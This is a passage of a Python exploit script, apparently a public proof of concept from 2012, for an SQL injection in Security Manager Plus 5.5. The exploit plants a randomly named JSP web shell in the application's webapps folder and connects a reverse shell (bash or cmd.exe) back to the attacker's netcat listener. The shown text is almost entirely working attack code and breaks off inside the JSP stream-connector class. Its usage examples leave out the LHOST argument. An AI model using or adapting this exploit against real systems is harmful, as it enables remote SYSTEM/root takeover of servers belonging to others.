if (len(sys.argv) != 5):
print ""
print "[*] Security Manager Plus 5.5 build 5505 and lower Remote SYSTEM/root SQLi exploit (Windows+Linux) - xistence (xistence<[at]>0x90.nl) - 2012-05-29"
print ""
print "[*] Usage: secman-sql.py <RHOST> <LHOST> <LPORT> <OS>"
print "[*] I.e.: ./secman-sql.py 192.168.2.66 8888 linux"
print "[*] I.e.: ./secman-sql.py 192.168.2.66 8888 win"
print "[*]"
print "[*] RHOST = Remote Host which runs Security Manager Plus"
print "[*] LHOST = IP address of local machine (machine where you run the exploit from"
print "[*] LPORT = Port on the local machine where you will run NC on for our reverse shell"
print "[*] OS = linux/win"
print ""
print ""
exit(0)
rhost = sys.argv[1]
lhost = sys.argv[2]
lport = sys.argv[3]
osys = sys.argv[4]
if osys == 'linux':
command = "/bin/bash"
elif osys == 'win':
command = "cmd.exe"
else:
print "Choose a valid OS, linux/win"
exit()
filename = ''
for i in random.sample('abcdefghijklmnopqrstuvwxyz1234567890',6):
filename+=i
filename +=".jsp"
output_path = "../../webapps/SecurityManager/%s" %filename
jsp = ''' <%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%
class StreamConnector extends Thread
{
InputStream is;
OutputStream os;
StreamConnector( InputStream is, OutputStream os )
{
this.is = is;
this.os = os;
}
public void run()
{
BufferedReader in = null;
BufferedWriter out = null;
try
{
in = new BufferedReader( new InputStreamReader( this.is ) );
out = new BufferedWriter( new OutputStreamWriter( this.os ) );
char buffer[] = new char[8192];
int length;
while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
{
out.write( buffer, 0, length );
out.flush();
}
} catch( Exception e ){}
try
{
if( in != null )
in.close();
if( out != null )
out.close();
} catch( Exception e ){}
}
}